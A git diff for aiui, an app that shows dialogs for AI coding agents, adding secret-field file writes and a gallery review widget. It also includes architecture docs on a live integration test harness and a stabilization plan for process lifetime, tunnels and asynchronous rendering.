+    //     bridge over the :7777 channel (never via the agent/LLM).
+    // Form values live under `result.values` ({action, values:{name:val}}).
+    const fieldValues: Record<string, any> = result?.values ?? {};
+    const targets = sessionOrigin ? [] : collectTargetFields(spec);
+    if (targets.length > 0) {
+      const values: Record<string, string> = {};
+      for (const t of targets) {
+        const v = fieldValues[t.name];
+        values[t.name] = v == null ? "" : String(v);
+      }
+      let outcomes: Record<string, any> = {};
+      try {
+        outcomes = await invoke("write_dialog_targets", { id, values });
+      } catch (e) {
+        console.error(`[aiui] write_dialog_targets failed for ${id}: ${e}`);
+        // Synthesise a failure outcome so the agent is informed instead of
+        // silently receiving nothing — and we can still strip secrets below.
+        for (const t of targets) {
+          outcomes[t.name] = { written: false, target: "", bytes: 0, error: String(e) };
+        }
+      }
+      // Merge outcomes into result.values; strip raw secret values regardless
+      // of write success so a secret can never leak even on the error path.
+      for (const t of targets) {
+        const outcome = outcomes[t.name] ?? {
+          written: false,
+          target: "",
+          bytes: 0,
+          error: "no outcome returned",
+        };
+        if (t.kind === "secret") {
+          fieldValues[t.name] = outcome;
+        } else {
+          fieldValues[t.name] = { value: fieldValues[t.name], ...outcome };
+        }
+      }
+    }
+
     // v0.4.45 (Bug #3): never swallow the invoke result silently. If
     // dialog_submit fails the agent would otherwise hang forever with
     // no signal — at least surface it to the console for diagnosis.
@@ -269,7 +339,9 @@
     two `confirm`s). Without it, Svelte recycles the component and
     stale field/checkbox/radio state from the previous dialog can bleed
     into the current one — silently sending wrong answers back to the
-    caller. Issue #H-1 in v0.4.10 review. -->
+    caller. Issue #H-1 in v0.4.10 review. Session identity (I8) lives in
+    the native title bar — set by Rust in build_dialog_window — not in the
+    work area, so it can never overlap dialog content. -->
   {#key current.id}
     {#if current.spec.kind === "ask"}
       <Ask spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
@@ -277,6 +349,8 @@
       <Form spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
     {:else if current.spec.kind === "confirm"}
       <Confirm spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
+    {:else if current.spec.kind === "gallery"}
+      <Gallery spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
     {:else}
       <main class="window-shell">
         <div class="window-scroll">
@@ -291,7 +365,7 @@
   {/key}
 {:else}
   <!-- Brief idle state — only visible during the few hundred ms
-       between window-show and the dialog:show event arriving. -->
+       between window-show and the spec arriving. -->
   <main class="window-shell">
     <div class="idle"></div>
   </main>
@@ -302,6 +376,9 @@
     min-height: 80px;
   }
 
+  /* Session identity (I8) now lives in the native window title bar (set by
+     Rust in build_dialog_window), so there is no in-work-area chip/markup to style. */
+
   /* TTL countdown banner. Position-fixed so the widget below keeps
      its own three-zone (.window-shell) layout intact — content
      scrolls beneath the banner. Banner height is deliberately small
diff --git a/companion/src/lib/updater.ts b/companion/src/lib/updater.ts
index ccac9ac..61ea73e 100644
--- a/companion/src/lib/updater.ts
+++ b/companion/src/lib/updater.ts
@@ -93,5 +93,10 @@ export async function checkForUpdates(opts: { silent?: boolean } = {}): Promise<
   } catch (e) {
     console.debug(`[aiui] clear_pending_update failed (continuing): ${e}`);
   }
+  // Invariant I1: the host's ExitRequested gate default-denies every
+  // Tauri-initiated exit. `relaunch()` fires ExitRequested, so we must latch
+  // the exit authority first (case (c), update-restart) or the relaunch would
+  // be vetoed and the freshly-installed update would never take effect.
+  await invoke("authorize_exit_for_update");
   await relaunch();
 }
diff --git a/companion/src/lib/widgets/Ask.svelte b/companion/src/lib/widgets/Ask.svelte
index 15fce4f..9ac1ff7 100644
--- a/companion/src/lib/widgets/Ask.svelte
+++ b/companion/src/lib/widgets/Ask.svelte
@@ -74,25 +74,25 @@
     {/each}
 
     {#if spec.allowOther ?? true}
-      <button
-        type="button"
-        class="option"
-        class:selected={otherActive}
-        onclick={toggleOther}
-      >
+      <!-- The text field is a SIBLING of the toggle, never nested inside a
+           <button>. Nesting an <input> in a <button> made WebKit treat the
+           Space key as button-activation, which flipped `otherActive` off,
+           destroyed the field and stole focus on every space typed. -->
+      <div class="option" class:selected={otherActive}>
         <div style="flex: 1;">
-          <div class="label">{$_("dialog.other_answer")}</div>
+          <button type="button" class="other-toggle" aria-pressed={otherActive} onclick={toggleOther}>
+            <div class="label">{$_("dialog.other_answer")}</div>
+          </button>
           {#if otherActive}
             <input
               type="text"
               placeholder={$_("dialog.other_placeholder")}
               bind:value={other}
               style="margin-top: 6px;"
-              onclick={(e) => e.stopPropagation()}
             />
           {/if}
         </div>
-      </button>
+      </div>
     {/if}
   </div>
 
@@ -103,3 +103,21 @@
     <button class="primary" disabled={!canSubmit} onclick={submit}>{$_("dialog.submit")}</button>
   </footer>
 </main>
+
+<style>
+  /* The "other answer" label is a plain toggle button so the text field can
+     sit beside it (not inside it). Visual is carried by the surrounding
+     `.option` card; the button itself is invisible. */
+  .other-toggle {
+    display: block;
+    width: 100%;
+    text-align: left;
+    background: none;
+    border: none;
+    padding: 0;
+    margin: 0;
+    font: inherit;
+    color: inherit;
+    cursor: pointer;
+  }
+</style>
diff --git a/companion/src/lib/widgets/Form.svelte b/companion/src/lib/widgets/Form.svelte
index 77a1b79..9d31574 100644
--- a/companion/src/lib/widgets/Form.svelte
+++ b/companion/src/lib/widgets/Form.svelte
@@ -38,10 +38,24 @@
     values: Record<string, string | number | null>;
   };
 
+  // Issue #135: optional per-field file-write target. Orthogonal to the field
+  // kind. On affirmative submit aiui writes the entered value to this path on
+  // the agent's host; for a `secret` field the value is written-only (never
+  // returned). The actual write + destination resolution happen Rust-side
+  // (DialogShell → write_dialog_targets); here it only drives the inline note.
+  type WriteTarget = {
+    mode: "create" | "substitute";
+    path: string;
+    perm?: string;
+    overwrite?: boolean;
+    placeholder?: string;
+  };
+
   type Field =
-    | { kind: "text"; name: string; label: string; placeholder?: string; default?: string; multiline?: boolean; required?: boolean }
-    | { kind: "password"; name: string; label: string; placeholder?: string; required?: boolean }
-    | { kind: "number"; name: string; label: string; default?: number; min?: number; max?: number; step?: number; required?: boolean }
+    | { kind: "text"; name: string; label: string; placeholder?: string; default?: string; multiline?: boolean; required?: boolean; target?: WriteTarget }
+    | { kind: "password"; name: string; label: string; placeholder?: string; required?: boolean; target?: WriteTarget }
+    | { kind: "secret"; name: string; label: string; placeholder?: string; required?: boolean; target?: WriteTarget }
+    | { kind: "number"; name: string; label: string; default?: number; min?: number; max?: number; step?: number; required?: boolean; target?: WriteTarget }
     | { kind: "select"; name: string; label: string; options: SelectOption[]; default?: string; required?: boolean }
     | { kind: "checkbox"; name: string; label: string; default?: boolean }
     | { kind: "slider"; name: string; label: string; min: number; max: number; step?: number; default?: number }
@@ -649,6 +663,8 @@
             {/if}
           {:else if f.kind === "password"}
             <input type="password" placeholder={f.placeholder ?? ""} bind:value={values[f.name]} autocomplete="off" />
+          {:else if f.kind === "secret"}
+            <input type="password" placeholder={f.placeholder ?? ""} bind:value={values[f.name]} autocomplete="off" spellcheck="false" />
           {:else if f.kind === "number"}
             <input type="number" min={f.min} max={f.max} step={f.step ?? 1} bind:value={values[f.name]} />
           {:else if f.kind === "select"}
@@ -684,6 +700,20 @@
               <code>{values[f.name]}</code>
             </div>
           {/if}
+          {#if "target" in f && f.target}
+            <!-- Issue #135: show the user *where* this value will be written
+                 before they approve by submitting. The affirmative button IS
+                 the per-operation approval. -->
+            <p class="write-target">
+              <span class="wt-icon" aria-hidden="true">↳</span>
+              {f.kind === "secret" ? "Wird geschrieben (nicht an den Agent zurück):" : "Wird zusätzlich geschrieben:"}
+              <code>{f.target.path}</code>
+              <span class="wt-meta"
+                >mode: {f.target.mode}{f.target.perm ? `, ${f.target.perm}` : ""}{f.target.overwrite
+                  ? ", overwrite"
+                  : ""}</span>
+            </p>
+          {/if}
         </div>
       {/if}
     {/each}
@@ -724,6 +754,21 @@
   .static-text.info { color: var(--fg); }
   .static-text.warn { border-color: #f59e0b; background: color-mix(in srgb, #f59e0b 10%, var(--surface)); }
   .static-text.muted { color: var(--muted); font-size: 12px; }
+  .write-target {
+    margin: 4px 0 0;
+    font-size: 12px;
+    color: var(--muted);
+    display: flex;
+    flex-wrap: wrap;
+    align-items: baseline;
+    gap: 4px 6px;
+  }
+  .write-target code {
+    font-size: 11px;
+    word-break: break-all;
+  }
+  .write-target .wt-icon { color: var(--accent); }
+  .write-target .wt-meta { color: var(--muted); opacity: 0.8; }
 
   /* --- markdown --- */
   .markdown-field {
diff --git a/companion/src/lib/widgets/Gallery.svelte b/companion/src/lib/widgets/Gallery.svelte
new file mode 100644
index 0000000..790c4c7
--- /dev/null
+++ b/companion/src/lib/widgets/Gallery.svelte
@@ -0,0 +1,209 @@
+<script lang="ts">
+  import { _ } from "svelte-i18n";
+
+  type Action = {
+    label: string;
+    value: string;
+    primary?: boolean;
+    success?: boolean;
+    destructive?: boolean;
+  };
+  type Item = {
+    value: string; // stable id returned in the result
+    src?: string; // image (data:/http/local→data) or video (data:/http; local video lands with the scp-transfer increment)
+    alt?: string;
+    label?: string;
+    detail?: string; // short context shown beside the thumbnail
+    max_height?: number;
+  };
+  type Spec = {
+    kind: "gallery";
+    title?: string;
+    description?: string;
+    header?: string;
+    items: Item[];
+    actions?: Action[]; // per-item decision buttons; default Approve / Revise / Skip
+    comment?: boolean; // show a per-item comment field
+    columns?: number; // grid columns; default responsive auto-fill
+    submitLabel?: string;
+    cancelLabel?: string;
+  };
+
+  let { spec, onsubmit, oncancel }: { spec: Spec; onsubmit: (r: any) => void; oncancel: () => void } =
+    $props();
+
+  const DEFAULT_ACTIONS: Action[] = [
+    { label: "Approve", value: "approve", success: true },
+    { label: "Revise", value: "revise" },
+    { label: "Skip", value: "skip" },
+  ];
+  const actions = $derived(spec.actions && spec.actions.length ? spec.actions : DEFAULT_ACTIONS);
+
+  // Per-item decision + comment, keyed by item value.
+  let decisions = $state<Record<string, string>>({});
+  let comments = $state<Record<string, string>>({});
+
+  function pick(itemValue: string, actionValue: string) {
+    const next = decisions[itemValue] === actionValue ? "" : actionValue; // re-click clears
+    decisions = { ...decisions, [itemValue]: next };
+  }
+
+  const decidedCount = $derived(Object.values(decisions).filter(Boolean).length);
+
+  function isVideo(src: string | undefined): boolean {
+    // Video = inline `data:video/` URL, or a known extension followed by `?`, `#` or end.
+    const byExtension = /\.(mp4|mov|m4v|webm)(\?|#|$)/i;
+    return !!src && (src.startsWith("data:video/") || byExtension.test(src));
+  }
+
+  function submit() {
+    // Report only the items the user touched: a decision, a comment, or both.
+    const out: Record<string, { decision: string; comment?: string }> = {};
+    for (const { value } of spec.items) {
+      const decision = decisions[value] || "";
+      const comment = (comments[value] || "").trim();
+      if (!decision && !comment) continue;
+      out[value] = { decision, ...(comment ? { comment } : {}) };
+    }
+    onsubmit({ decisions: out });
+  }
+
+  const cols = $derived(spec.columns && spec.columns > 0 ? spec.columns : 0);
+</script>
+
+<main class="window-shell">
+  <div class="window-scroll">
+    {#if spec.header}<span class="chip">{spec.header}</span>{/if}
+    {#if spec.title}<p class="title">{spec.title}</p>{/if}
+    {#if spec.description}<p class="subtitle">{spec.description}</p>{/if}
+
+    <div
+      class="gallery-grid"
+      style={cols
+        ? `grid-template-columns: repeat(${cols}, minmax(0, 1fr));`
+        : "grid-template-columns: repeat(auto-fill, minmax(220px, 1fr));"}
+    >
+      {#each spec.items as item (item.value)}
+        <div class="gallery-item" class:decided={!!decisions[item.value]}>
+          {#if item.src}
+            <div class="gallery-thumb" style={item.max_height ? `max-height:${item.max_height}px` : ""}>
+              {#if isVideo(item.src)}
+                <!-- svelte-ignore a11y_media_has_caption -->
+                <video src={item.src} controls preload="metadata"></video>
+              {:else}
+                <img src={item.src} alt={item.alt ?? item.label ?? item.value} />
+              {/if}
+            </div>
+          {/if}
+          {#if item.label}<div class="gallery-label">{item.label}</div>{/if}
+          {#if item.detail}<div class="gallery-detail">{item.detail}</div>{/if}
+
+          <div class="gallery-actions">
+            {#each actions as a (a.value)}
+              <button
+                type="button" class="ga-btn"
+                aria-pressed={decisions[item.value] === a.value}
+                class:selected={decisions[item.value] === a.value}
+                class:success={a.success}
+                class:danger={a.destructive}
+                class:primary={a.primary}
+                onclick={() => pick(item.value, a.value)}
+              >{a.label}</button>
+            {/each}
+          </div>
+
+          {#if spec.comment}
+            <input
+              type="text"
+              class="gallery-comment"
+              placeholder={$_("dialog.gallery.comment_placeholder")}
+              bind:value={comments[item.value]}
+            />
+          {/if}
+        </div>
+      {/each}
+    </div>
+  </div>
+
+  <footer class="window-footer">
+    <span class="gallery-count">{$_("dialog.gallery.decided", { values: { n: decidedCount, total: spec.items.length } })}</span>
+    <button onclick={oncancel}>{spec.cancelLabel ?? $_("dialog.cancel")}</button>
+    <button class="primary" onclick={submit}>{spec.submitLabel ?? $_("dialog.submit")}</button>
+  </footer>
+</main>
+
+<style>
+  .gallery-grid {
+    display: grid;
+    gap: 12px;
+    margin-top: 8px;
+  }
+  .gallery-item {
+    display: flex;
+    flex-direction: column;
+    gap: 6px;
+    padding: 8px;
+    border: 1px solid var(--border);
+    border-radius: 8px;
+    background: var(--surface-raised, var(--surface));
+    box-shadow: var(--shadow-sm);
+    transition: border-color 0.12s ease;
+  }
+  .gallery-item.decided {
+    border-color: var(--accent);
+  }
+  .gallery-thumb {
+    display: flex;
+    justify-content: center;
+    align-items: center;
+    overflow: hidden;
+    border-radius: 6px;
+    background: var(--surface);
+    max-height: 200px;
+  }
+  .gallery-thumb img,
+  .gallery-thumb video {
+    max-width: 100%;
+    max-height: inherit; /* follow .gallery-thumb: 200px default or the inline per-item max_height */
+    height: auto;
+    object-fit: contain;
+  }
+  .gallery-label {
+    font-weight: 600;
+    font-size: 13px;
+  }
+  .gallery-detail {
+    font-size: 12px;
+    color: var(--fg-muted, color-mix(in srgb, var(--fg) 62%, var(--bg)));
+    white-space: pre-wrap;
+  }
+  .gallery-actions {
+    display: flex;
+    flex-wrap: wrap;
+    gap: 6px;
+    margin-top: auto;
+  }
+  .ga-btn {
+    flex: 1 1 auto;
+    padding: 4px 8px;
+    font-size: 12px;
+    border: 1px solid var(--border);
+    border-radius: 6px;
+    background: var(--surface);
+    cursor: pointer;
+  }
+  .ga-btn.selected {
+    border-color: var(--accent);
+    background: color-mix(in srgb, var(--accent) 18%, var(--bg));
+    font-weight: 600;
+  }
+  .gallery-comment {
+    width: 100%;
+    margin-top: 2px;
+  }
+  .gallery-count {
+    flex: 1 1 auto;
+    font-size: 12px;
+    color: var(--fg-muted, color-mix(in srgb, var(--fg) 55%, var(--bg)));
+  }
+</style>
diff --git a/docs/architecture/integration-harness.md b/docs/architecture/integration-harness.md
new file mode 100644
index 0000000..021820d
--- /dev/null
+++ b/docs/architecture/integration-harness.md
@@ -0,0 +1,116 @@
+# aiui remote-path integration harness
+
+The bugs that made aiui whack-a-mole (409-storm, stranded empty windows,
+ReadError, host dying after submit) all lived in the **timing / integration
+layer** — the live interplay of companion ⟷ tunnel ⟷ bridge ⟷ dialog
+lifecycle. Pure-function unit tests can't reach that layer, which is exactly
+why it stayed unprotected. This harness drives the **real** chain and asserts
+its behaviour, so that class of regression is caught before a release instead
+of by the user.
+
+Key fact established 2026-05-30: a Claude Code session running on the remote
+can reach the real companion's HTTP API over the existing reverse tunnel
+(`localhost:7777` + the pushed token). So the harness driver runs **from the
+remote**, against a **real** companion on the Mac — not a simulated one.
+
+## Stufe 1 — read-only smoke (DONE)
+
+`python/tests/test_integration_live.py`. Runs from the remote against the live
+companion. Strictly read-only (`/ping`, `/health`, `/version`, `/probe`,
+401-on-bad-token, `GET /render/{id}` unknown-id) → **no dialog windows pop**.
+
+- Opt-in via `AIUI_LIVE=1`; the normal `pytest` run and CI skip it (no network).
+- Skips with a message if no companion is reachable.
+- Version-tolerant: `wire_version` and the async `GET /render/{id}` route are
+  checked only if present, so it also passes against an older installed release.
+
+```
+AIUI_LIVE=1 uv run --extra dev pytest tests/test_integration_live.py -v
+```
+
+Verified 2026-05-30: 6 passed against the installed companion (v0.4.45) over
+the tunnel.
+
+## Stufe 2 — render path + window lifecycle (DESIGN)
+
+This is where the actual bugs lived. To exercise it automatically we must (a)
+complete a render→answer→teardown cycle without a human, (b) observe window
+state, and (c) NOT spam the user's screen with real dialogs.
+
+There is deliberately **no** HTTP endpoint to answer a dialog in production (it
+would be a UX/security hole). So Stufe 2 needs a small, strictly test-gated
+hook in the companion — the "test counterpart":
+
+### Companion test mode (preferred)
+
+Active only when launched with `AIUI_TEST_MODE=1` **and** authenticated with the
+token. Absent from normal runs — the routes 404 when the env is unset, so it
+can never be reached in production. It adds:
+
+- `POST /test/answer/{id}` — resolve a pending dialog by id with a canned
+  `submit{result}` or `cancel`, exactly as the frontend would. Lets the driver
+  complete the cycle with no UI automation and no human.
+- Test-mode renders the dialog window **hidden / off-screen** (or suppresses
+  the window entirely, registry-only) so a test sweep doesn't flash dialogs at
+  the user.
+- `/health` (or a `/test/windows`) reports the **dialog-window labels** so the
+  driver can assert "one window per render, torn down after terminal".
+
+### Driver scenarios (pytest, `AIUI_LIVE=1` + companion in test mode)
+
+Mirrors the spec's required scenarios:
+
+- **async render**: `POST /render` (`x-aiui-async`) → 202 `{id}`; `GET
+  /render/{id}` → `{pending}`; `POST /test/answer/{id}` → `GET` returns the
+  terminal result; assert the window for `id` is gone.
+- **no-409 / multi-window**: fire two concurrent `POST /render` → assert **both**
+  get 202 `{id}` (single-occupancy gone); assert two distinct windows; answer
+  both; assert both torn down.
+- **cancellation-safety**: start a render, drop the client connection
+  mid-poll → assert the registry slot frees and the window is destroyed (no
+  2 h leak / 409 on the next render).
+- **TTL / channel-drop / Claude-Desktop-quit / restart** — the remaining spec
+  scenarios, each asserting a clean terminal outcome.
+
+### Alternative without a companion change
+
+A Mac-side AppleScript/JXA agent that finds aiui dialog windows, clicks their
+buttons, and reports the window count. Works against an unmodified companion,
+but is timing-fragile, needs Accessibility permission, and can't suppress the
+on-screen flash. The companion test-mode above is cleaner and is the
+recommended path; this stays a fallback.
+
+## Lifecycle-failure runbook (manual, observable via the event log)
+
+Several spec scenarios are inherently stateful and interactive — they kill a
+process or a tunnel *mid-call* — so they can't be read-only pytest cases
+without orchestrating real subprocesses. The v0.8.0 **lifecycle event log**
+(`lifecycle_log`, issue #137) makes them *verifiable by inspection* instead:
+each transition is named, ring-buffered, and dumped to the trace log on exit.
+`/health` reports the current `lifecycle_phase` live.
+
+Run each against a real build, then read `lifecycle_phase` + the trace dump.
+
+| Scenario | Action | Expected event-log signature |
+|---|---|---|
+| Window-X is not exit (I2) | Close the setup window | `window close treated as hide`; phase stays `Serving`; process alive |
+| ⌘Q with Claude Desktop up | Quit aiui via menu while CD runs | `ExitRequested default-denied`; phase stays `Serving` |
+| Last child gone, CD alive | Quit the only Claude Code session | `phase Serving → GracePending`, `grace armed (5s)`, `grace resolved → stay`, `phase GracePending → Serving` |
+| Wirt gone (CD quit) | Quit Claude Desktop | `… → GracePending`, `grace resolved → exit (claude_desktop_running=false)`, `phase → Exiting`, `host exit authorized (claude-desktop-gone)`, `lifecycle-dump …` |
+| Child churn | Restart Claude Desktop quickly | `child detached`/`child attached` around a `grace resolved → stay` (no exit) |
+| Update-authorized exit | Trigger `/update` install | `host exit authorized (exit-authorized-uninstall-or-update)` |
+
+The point is no longer "did it behave?" inferred from whether a window
+lingered — it's the named transition trail, which is exactly the forensic
+record whose absence made the 0.4.x lifecycle a guessing game.
+
+## Preconditions & honest scope
+
+- **To validate *this* PR's code, the v0.5.0 build must run on the Mac.** The
+  driver tests the companion that's installed; against the current release
+  (v0.4.45) Stufe-2 assertions for new behaviour (async, no-409) don't apply.
+- Stufe 2 is a real build (the test-mode hook in the companion + the driver
+  suite). It is **not** wired into ordinary CI, which has no real Mac+remote
+  pair — it's a pre-release check run against a real build, or a dedicated rig.
+- The test-mode hook must be reviewed to confirm it cannot activate in
+  production (env-gated at launch, token-gated, routes absent otherwise).
diff --git a/docs/architecture/stabilization-plan.md b/docs/architecture/stabilization-plan.md
new file mode 100644
index 0000000..3f65bd8
--- /dev/null
+++ b/docs/architecture/stabilization-plan.md
@@ -0,0 +1,388 @@
+# aiui Stabilization Plan (locked spec — guards against drift)
+
+Status: Steps 1–4 implemented (Refs #137, v0.5.0). Step 4's tunnel was settled
+empirically (2026-05-30): aiui-dedicated is correct and already in place — no
+refactor needed; piggyback is impossible (Claude Desktop provides no reverse
+forward). Per-step implementation records are inline under each step.
+
+**Cross-cutting closed (v0.8.0):** (1) the lifecycle state machine + named
+event log landed as `companion/src-tauri/src/lifecycle_log.rs` — explicit
+`Phase` (Starting/Serving/GracePending/Exiting), named `LifecycleEvent`s wired
+at every lifetime decision point, a bounded ring dumped to the trace on exit,
+and the live phase surfaced in `/health`. (2) the remote-path harness: the
+read-only `AIUI_LIVE` smoke suite was extended (lifecycle phase, media route,
+media-auth), and the inherently-interactive failure scenarios (window-X, ⌘Q,
+grace stay, Wirt-gone exit, child churn, update exit) are now a **manual
+runbook keyed on the event-log signatures** (see `integration-harness.md`) —
+the event log is what turns those from "infer from window behaviour" into a
+named, inspectable transition trail. With both done, #137 is complete.
+Origin: root-cause analysis 2026-05-29 (Opus 4.8 code analysis + independent
+Codex diagnosis, convergent; external validation of the three pivotal facts).
+
+The instability is not a bug-swarm but **one architectural fault with many
+symptoms**: aiui fuses three components with different lifecycles into one
+binary whose lifetime hangs on a fragile proxy (count of mcp-stdio children
+attached to a socket + 60 s grace) instead of on the real signal (is the host
+Claude Desktop alive). The remote path additionally lacks the resurrection and
+cold-start retry the local path has.
+
+This plan is measured against the invariants below. Every change either
+establishes an invariant or is out of scope.
+
+## Invariants (the contract)
+
+- **I1 — Host planned-exit ONLY in three cases:** (a) Claude Desktop terminates,
+  (b) aiui is uninstalled, (c) update-restart. *Every other process exit is a
+  crash* — logged as such, never traced as a clean shutdown.
+- **I2 — Window close ≠ process exit.** Red X / ⌘W / "Beenden" on any window =
+  hide window (+ demote to Accessory if no dialog remains). Never `app.exit`.
+- **I3 — Tunnel owner = the Mac (SSH client), always.** Structurally forced:
+  Mac→remote reachability is the precondition of the whole setup; remote→Mac is
+  never guaranteed. The remote bridge is a passive forwarder; only the Mac can
+  establish/repair the tunnel.
+- **I4 — Remote bridge planned-exit ONLY:** stdin-EOF (its Claude Code session
+  ended) or deregistration. *Never* killed from the Mac to force a version.
+- **I5 — Nothing kills a process / tunnel / bridge that may hold an in-flight
+  request.** Graceful drain before any teardown.
+- **I6 — Local and remote bridges have identical resilience semantics**
+  (cold-start poll, async-render polling, progress notifications, error
+  classification, timeouts).
+- **I7 — Every render resolves to exactly one terminal outcome** (kept from
+  current behaviour).
+- **I8 — Multi-window:** N concurrent dialogs allowed; **each window carries a
+  human-legible session identifier** so the user can tell which session a dialog
+  belongs to.
+
+## Step 1 — Host lifetime invariant (decided; highest leverage, lowest risk)
+
+Files: `lifetime.rs`, `lib.rs`.
+
+Single exit authority. Introduce one predicate consulted by every
+exit-candidate path:
+
+    fn host_should_exit(reason) -> bool
+      = explicit_uninstall_or_update  // cases (b)/(c): set by quit_app / updater
+        || !setup::is_claude_desktop_running()  // case (a): the real Wirt (= Claude Desktop) signal
+
+- **`lifetime::make_shutdown_watcher` (grace-expired):** keep the *edge* (last
+  child disconnected) but, on that edge, consult `is_claude_desktop_running()`
+  (already exists, `pgrep -f /Applications/Claude.app/`). CD alive → **do not
+  arm grace, do not exit** (CD merely dropped/restarted the aiui MCP server, or
+  Cowork churn). CD gone → short grace (≤5 s) then exit. This reuses an existing
+  edge + an existing helper → **no objc bridge, no continuous poll tick.**
+  - When CD quits it closes its children's stdin → EOF → they exit → disconnect
+    → the edge fires → host exits. The edge therefore *does* fire on the only
+    legitimate "Wirt endet" (Claude Desktop terminates) event.
+  - Optional enhancement (later): an `NSWorkspaceDidTerminateApplication`
+    observer (objc2) for instant detection. Not required for correctness.
+- **Setup-window `CloseRequested` (lib.rs `on_window_event`):** `api.prevent_close()`
+  + `window.hide()` + demote to Accessory. Remove the
+  `setup-close-no-children → app.exit(0)` path entirely.
+- **`RunEvent::ExitRequested` (lib.rs):** **default-deny** — `api.prevent_exit()`
+  for *every* Tauri-initiated exit. Only the explicit paths (quit_app / updater
+  restart) and the watcher's CD-gone exit may terminate. Removes the
+  veto-by-child-count logic.
+- **`LifetimeStats` child counter:** demoted to telemetry (`/health`) + the
+  start-trigger only (`mcp_attach` first attach → `open --auto`). It **never**
+  gates exit again.
+
+No-regression: the grace-exit/idle-exit existed to reap stale state; that is now
+covered by the existing `disk_version_if_stale` self-check + the housekeeping
+sweeps, which stay.
+
+## Step 2 — Remote bridge never killed to force a version (decided)
+
+Files: `setup.rs`, `lib.rs`, `http.rs`, `python/.../server.py`.
+
+- Remove `kill_remote_mcp_stdio` / `pkill -f 'aiui-mcp'` from the GUI-startup
+  remote-pin loop (`lib.rs`) and from `resync_remote` / `add_remote` re-add.
+  Patch the pin in `~/.claude.json`; it takes effect at the **next natural
+  spawn**. A live session keeps its version until it ends.
+- Keep an outbound kill ONLY for true deregistration (`remove_remote` /
+  uninstall), and even there prefer config-removal + natural session end over a
+  broad `pkill`. If a kill is kept, scope it precisely (never blunt `-f
+  aiui-mcp`, which has cross-session blast radius — the remote twin of the
+  0.4.42 Cowork-kill).
+- Cooperative version floor (replaces external enforcement): add `wire_version`
+  to `/version` + `/probe`. The bridge reads it on connect; on a hard
+  incompatibility it returns a **structured tool error** ("incompatible aiui
+  versions — restart this Claude Code session"), never gets killed, never
+  crashes. Tolerate ordinary version skew (the wire contract is versioned and
+  stable).
+
+> **Implemented (2026-05-30, PR #137).** `kill_remote_mcp_stdio`
+> (`ssh … pkill -f 'aiui-mcp'`) and all three of its callers — the GUI-startup
+> remote-pin loop, `add_remote` re-add, and `resync_remote` — are deleted. The
+> pin in `~/.claude.json` now takes effect at the next natural spawn; a live
+> session keeps its version until it ends. `resync_remote` is re-pin-only.
+> Deregistration (`remove_remote` / `uninstall_all`) was already
+> config-removal + tunnel-stop, no kill — left as is. Cooperative floor:
+> `WIRE_VERSION = 1` in `http.rs`, surfaced on `/version` + `/probe`; the
+> Python bridge's `_check_wire_compat` reads it once per process and raises a
+> structured "restart this session" error only on a hard wire mismatch (absent
+> field → treated as v1, transient read errors tolerated). Tests: Rust 105
+> green, Python 21 green (4 new wire-compat). The Rust bridge (`mcp.rs`) is the
+> same binary as the companion, so it needs no floor check.
+
+## Step 3 — Async render + bridge parity (decided; closes the ReadError class)
+
+Files: `http.rs`, `dialog.rs`, `mcp.rs`, `python/.../server.py`.
+
+> **Interim fix already landed (2026-05-30, with the Step-1 PR #137):** the
+> acute 409-storm + stranded-empty-window pair was a *cancellation-safety* hole,
+> not the full async gap. The synchronous `/render` handler parks on
+> `timeout(DIALOG_TTL=2h, result_rx)` while the MCP client gives up far sooner
+> (the local Rust bridge times out at 300 s). On client give-up Axum drops the
+> handler future, and none of the explicit teardown ran → the registry entry
+> leaked for 2 h (409 for every later render) and the surfaced window stranded
+> empty. A `RenderGuard` (RAII) now cancels the entry + destroys the window on
+> *any* drop, including the future-cancelled case. This makes the current
+> handler cancellation-safe; the async-render protocol below still supersedes it
+> (it removes the held connection entirely and is what properly supports long
+> human fills without the client timing out at all).
+
+- **Async `/render` (RFC point #1, never built):** `POST /render` registers the
+  dialog and returns `{id, ttl}` immediately. New `GET /render/{id}` is a
+  bounded long-poll (~25 s) returning `{pending}` or the terminal result.
+  Removes the multi-minute open HTTP connection that any GUI/tunnel blip turns
+  into ReadError.
+- **Both bridges identical:** POST then loop `GET /render/{id}` until terminal
+  or the client gives up; emit `notifications/progress` each iteration.
+- **Python bridge to full parity (I6):**
+  - Add the `wait_for_aiui` cold-start poll (`/ping` up to ~30 s) before
+    posting — mirror the Rust bridge. Replaces the brittle single 3 s preflight.
+  - Add progress notifications (FastMCP progress API — verify exact call).
+  - Switch to the async-render polling loop above.
+  - Classify errors precisely: TCP-refused (tunnel down) vs. connected-but-no-
+    HTTP (= ReadError: tunnel up, Mac down) vs. 401 (token). Today the remote
+    `ConnectError` branch is dead and ReadError gets a misleading message.
+
+> **Implemented (2026-05-30, PR #137) — additive / backward-compatible.** Async
+> render is opt-in via the `x-aiui-async` request header, *not* a replacement of
+> the synchronous long-poll. This keeps the proven local path intact and means
+> old bridges (which never send the header) keep working unchanged, so
+> `WIRE_VERSION` stays 1.
+> - **Companion (`http.rs`):** `POST /render` with the header registers +
+>   surfaces the dialog, hands resolution to a detached task that fills an
+>   `AsyncSlot`, and returns `202 {id, ttl_secs}`. New `GET /render/{id}`
+>   poll-loops (200 ms ticks, bounded by `ASYNC_POLL_WINDOW` = 25 s) returning
+>   the terminal result (drained once) / `{pending:true}` / `404`. Without the
+>   header, the legacy synchronous path runs untouched. Resolution + window
+>   teardown are shared by both via `resolve_dialog`. Resolved-but-uncollected
+>   slots are swept at `DIALOG_TTL`.
+> - **Both bridges (`mcp.rs`, `server.py`):** POST with the header, then loop
+>   `GET /render/{id}` until terminal; each GET is bounded (40 s > server
+>   window) so a blip costs one poll, never a held connection. Both fall back to
+>   the synchronous result if the companion answers 200 instead of 202 (so a new
+>   bridge works against an old companion too).
+> - **Python parity (I6):** added `_wait_for_aiui` (`/ping` cold-start poll,
+>   ~30 s), MCP progress notifications each pending poll (FastMCP
+>   `Context.report_progress`, best-effort), the async polling loop, and an
+>   explicit `httpx.ReadError` branch ("tunnel up, Mac not serving") distinct
+>   from `ConnectError`. The Rust bridge already had cold-start + progress.
+> - Tests: Rust 106 (slot lifecycle), Python 26 (+5: poll terminal/pending/404,
+>   progress tick, cold-start tolerance). Not yet exercised end-to-end against a
+>   live remote — integration harness is still the open cross-cutting item.
+
+## Step 4 — Tunnel mechanism + multi-window (both resolved)
+
